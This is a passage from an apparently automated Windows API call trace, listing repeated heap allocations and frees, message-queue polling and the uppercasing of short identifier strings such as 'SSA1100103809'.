(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0149.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0149.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0149.309] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0149.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0149.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0149.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0149.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0149.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0149.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0149.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0149.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0149.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.311] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0149.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0149.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0149.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0149.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.311] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0149.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0149.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0149.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0149.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0149.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0149.313] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa210 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0149.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0149.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0149.313] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0149.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0149.314] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0149.314] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0149.314] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3c0 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0149.314] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0149.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0149.314] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0149.315] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.315] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0149.316] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0149.316] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0149.316] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2e8 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a745e0 [0149.316] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0149.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0149.316] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0149.317] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0149.317] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 